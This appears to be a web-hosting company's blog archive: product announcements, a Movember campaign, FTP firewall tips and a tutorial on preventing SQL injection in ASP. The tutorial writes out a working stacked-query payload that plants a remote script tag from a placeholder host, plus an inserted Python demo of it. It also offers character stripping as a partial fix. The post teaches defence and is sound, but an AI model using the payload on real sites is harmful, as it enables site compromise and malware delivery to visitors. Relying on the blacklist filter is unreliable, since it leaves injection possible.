admin

Movember is here!

You know those normally hygienic people who for some strange reason decide to throw it out the window once a year and grow a hideous moustache?
Well believe it or not they haven't gone mad, they are supporting Movember which aims to raise funds and awareness for men's health.

This month my staff are on the ball, setting up a campaign where 5% of every Web Hosting or HyperVPS account purchased in the month of November will go straight to the Movember Foundation.
That money will then go on to either the Prostate Cancer Foundation of Australia or beyondblue: the national depression initiative. Two worthy causes I think you'll agree.

For full details you can visit our Movember website or head on over to the official web site for all the details.

Battling SQL Injection

"SQL Injection" has become an increasingly common way for hackers to attack web sites, but what is SQL Injection and what can web developers do to avoid it?

SQL injection involves manipulating the variables sent to a web page so that additional SQL statements are executed as part of the queries built by the web site code.

There are a multitude of ways SQL Injection can be used for nefarious purposes, but today we are going to look at the method most commonly used at the moment: inserting malicious JavaScript files into web sites.

Take the following simple example using ASP:

testpage.asp 

<%
  szQuery = "Select * From myTable Where ID = " & Request("ID")
%>

Because the Request("ID") value isn't filtered or checked in any way, an attacker can manipulate the URL query string to append any SQL statements they like to the query, including ones that modify the table.

So if they have a script at, say, http://testdomain.local/bad.js and myTable has a column called "Description" which is used to display information on the page, an attacker could use the following:

"testpage.asp?ID=1;Update myTable set Description = '<script src="http://testdomain.local/bad.js"></script>' Where ID = 1"

This will update the record with ID = 1 to insert the javascript into the description field.

THIS IS BAD

So how does one fix it?

The best approach is to not use request variables directly in SQL in the first place, but in ASP this is not always an easy option.

In ASP.NET however, the problem can be solved by using the SqlCommand.Parameters collection to add each variable that is needed in the query.

Then the SQL Query will look something like this:

Select * From myTable Where ID = @ID;

But if you need to quickly fix older code in ASP, then filtering each request variable manually is a reasonable approach (though not completely foolproof).

<%
  szID = Request("ID")
  szID = Replace(szID, "'", "")
  szID = Replace(szID, ";", "")

  szQuery = "Select * From myTable Where ID = '" & szID & "'"
%>

The above strips potentially dangerous characters such as ' and ; from the variable entirely (it removes them rather than escaping them), so they can never reach the query.

Note that the above is only helpful if the ID variable is a string. 

If the variable is a known type other than a string (say Integer) then casting must be used to prevent nasty SQL from being inserted:

<%
  iID = CInt(Request("ID"))

  szQuery = "Select * From myTable Where ID = " & iID

  …
%>

In the above example, if an attacker tries to insert anything other than a whole number into ID, CInt raises a type mismatch error and the query is never built or run.
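To see how the approaches in this post behave on the exact URL payload shown above, here is an added example (not part of the original post) using Python's sqlite3 module as a stand-in for the ASP and SQL Server setup; the table, row and function names are constructed for the demonstration.

```python
import sqlite3

# Constructed stand-in for the page's myTable; the payload is the one shown in the post.
PAYLOAD = ("1;Update myTable set Description = "
           "'<script src=\"http://testdomain.local/bad.js\"></script>' Where ID = 1")

def make_db():
    """Fresh in-memory database with one row, as constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE myTable (ID INTEGER PRIMARY KEY, Description TEXT)")
    conn.execute("INSERT INTO myTable VALUES (1, 'Widget')")
    return conn

def description(conn):
    """Current Description of row 1; lets a check see whether the table was altered."""
    return conn.execute("SELECT Description FROM myTable WHERE ID = 1").fetchone()[0]

def lookup_concat(conn, raw_id):
    """testpage.asp as written: the request value is spliced into the SQL text.
    executescript() is used because, like SQL Server, it runs stacked statements;
    sqlite3's execute() would refuse the second one."""
    conn.executescript("Select * From myTable Where ID = " + raw_id)
    return description(conn)

def lookup_cast(conn, raw_id):
    """The CInt approach: int() raises ValueError for anything that is not a whole
    number, so the query is never built, matching CInt's type mismatch error."""
    id_value = int(raw_id)
    return conn.execute("Select Description From myTable Where ID = " + str(id_value)).fetchone()

def lookup_param(conn, raw_id):
    """The @ID approach: the driver binds the value, so it is compared as data
    and never parsed as SQL, whatever characters it contains."""
    return conn.execute("Select Description From myTable Where ID = ?", (raw_id,)).fetchone()
```

With the concatenated query the Description column ends up holding the script tag; with the cast or the bound parameter the row is untouched and a legitimate ID of 1 still returns its row.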

So there you have it, SQL Injection is easy to avoid once you know how.

IIS 7 Web Hosting – now available

Just a quick post to say that IIS 7.0 is now available on all our Web Hosting plans.

Check out http://www.studiocoast.com.au/web-hosting.aspx for more information.

 

Blackbriar is here!

If you've wondered why there haven't been any posts to our blog in the last few weeks then wonder no more!

I have been busy at work on the latest version of our customer management system codenamed "blackbriar" (see our blog entry about "Alcatraz" for what the system is all about).

The two key features of this release are:

  • Windows Server 2008 / IIS7 support out-of-the-box. All existing control panel features now work with any Windows server in our fleet, regardless of whether it is 2003 or 2008.
  • Hyper-V support for managing our Virtual Private Servers product. Currently only our staff have access to the new features but we will be releasing a VPS Manager for the customer control panel soon.

We'll be releasing an IIS7 based Web Hosting service to the public soon, but in the mean time power users may be more interested in our new Hyper-V VPS service which comes with Windows Server 2008 and IIS7 as standard.

 

Meet “Alcatraz” – Our customer management system

Alcatraz Island: a prison surrounded by water.

On the surface I'll admit it doesn't sound like such a great name to call a customer management system.
We were thinking more along the lines of the security aspects the name implies rather than the concept of our staff feeling imprisoned while using it!

Alcatraz or simply “Management Client” is the system our staff use to manage customer accounts on a daily basis.
Take a look at the screenshot below.

What will be immediately obvious to anyone who has worked in the web hosting industry before is that Alcatraz is an actual program and not a web site.
Most if not all off-the-shelf hosting management systems (such as Plesk etc) are web based and this can significantly increase the time it takes for a staff member to attend to a query.

Alcatraz on the other hand is super fast!

Features

Alcatraz was built from scratch to suit our unique way of doing things here at Studiocoast.
Some of the reasons why Alcatraz is great:

  • Complete. A member of the Studiocoast support team only needs one program to manage every aspect of our web hosting services. From billing to hosting to payroll!
  • Fast. Setting up an account for a new customer for example takes less than 10 seconds. Best of all, only a single button needs to be pressed.
  • Powerful. Through the Storage tab our staff can access customer backups and restore them within seconds.
  • Extendable. New features can be added in record time thanks to a centralised system.
  • hostControl. Our web based control panel for customers links directly into the Alcatraz system. Restoring databases through the program is exactly the same as doing it through the control panel.
  • Did I mention it does everything?

Technical Details

If you’re a programmer you may be interested in how it all works behind the scenes:

  • Built on .NET 3.0.
  • Management Client and hostControl both connect to a central WCF (Windows Communication Foundation) server.
  • Server primarily utilises WMI (Windows Management Instrumentation) to communicate with all the servers in our fleet (for tasks such as creating sites in IIS).

The Future

So what does the future hold for Alcatraz?

At the moment I am hard at work on version 3.0 codenamed Blackbriar.
It will feature native support for IIS7 and MySQL 5.0 plus much much more.

Conclusion

I hope this post has been educational. If you have any questions about “Alcatraz” feel free to post in the comments below.
Perhaps you are a customer and would like to see some new features in hostControl. I’m all ears!

FTP 7 Passive Firewall Setup

Just a quick note on FTP 7, the new FTP server software for Windows Server 2008.

A guide I found on iis.net describes setting up passive port ranges and opening them up in the firewall one by one.

I have found an alternative method which I think is a lot easier to setup:

1. Open up Windows Firewall with Advanced Security from Administrative Tools
2. Right click Inbound Rules and select New Rule
3. Select the Custom Rule option and click next.
4. Select All Programs and then click Customize next to Services
5. Select Apply to this service and select from the list Microsoft FTP Service
6. For all the next steps simply click Next accepting the defaults.
7. For the name call it something like "Microsoft FTP Firewall Access"
8. Click Finish

Enjoy!

Note: this rule allows access to any ports the FTP Service opens. This is usually port 21, plus any passive data ports it opens for client connections.

Hyper-V is live!

Click here for our Windows Server 2008 VPS service utilising Hyper-V, starting from $80 per month.

—-

June 26 will forever be remembered in history as the day Microsoft released Hyper-V to the server masses.
Ok, well maybe it isn't THAT memorable but it is still a pretty important piece of software in the Windows Hosting arena.

Why? Well I'm glad you asked…

Hyper-V is a hypervisor-based virtualisation platform that allows multiple concurrent operating systems to share a single host computer.

Now while Virtual Private Server technology has been around for many years now in many forms, Hyper-V, like any hypervisor based technology, brings additional benefits to the table:

  1. Performance

    Both Intel and AMD provide technology to allow hypervisor-aware operating systems more direct access to the CPU.
    Previously, VPS software has had to emulate the processor in order to convince the operating system it has a CPU all to itself.

  2. Isolation

    In an effort to get around the performance limitations in older technology, products such as Parallels Virtuozzo sub-divide a single operating system instance to give the appearance of multiple separate servers.

    This method of virtualisation has many limitations as it does not provide true isolation. A misbehaving program on one partition could potentially access the memory of another and cause corruption or worse.

    Hyper-V on the other hand will have none of those shenanigans. Each operating system instance is completely isolated and it is almost impossible for one to interfere with another.

  3. Administration

    Hyper-V comes with many administrative tools that make managing virtual servers a whole lot easier for system admins such as myself.
    We will be integrating many of these features into our hostControl control panel for end users to access.

  4. Friendly Product Licensing

    Friendly product licensing from Microsoft??? It's true, Hyper-V licensing for virtual servers is simple.
    One copy of the Windows Server 2008 Datacenter Edition license allows an unlimited number of virtual servers on a single machine.

So what does this all mean for the end user then?

Purchasing a Hyper-V based virtual server from providers such as Studiocoast has the following benefits:

  1. A server to call your own

    Install whatever you want, whenever you want with full Administrative access.
    Reboot the server yourself until you're blue in the face if you want, it is all yours!

  2. Need more memory, disk space? No problem!

    Each virtual server can have memory or disk space upgraded at the click of a button.
    This allows you to purchase a server based on what you need now, all with a clear and easy upgrade path for the future.

  3. Economical

    A virtual server is much cheaper than a dedicated server and a whole lot more flexible to boot.

  4. More uptime, less downtime

    In the unlikely event of hardware failure, each virtual server can be quickly copied to a functioning server.
    Virtual servers all use the same drivers regardless of the underlying server so hardware compatibility is never a problem.

So what are you waiting for? Check out our HyperVPS plans page.

Welcome!

It's been a long road to get here but the Studiocoast blog is finally online!

The Studiocoast team will be here to give you some insight into the workings of this humble Web Hosting provider.
We will also be offering some expert advice and tips shaped by the many challenges we have faced (and overcome) over the years.

Members of the team will each introduce themselves over the coming weeks as they find something to contribute!

I trust you will enjoy what we have to contribute to the blogosphere and hope you will find our posts useful.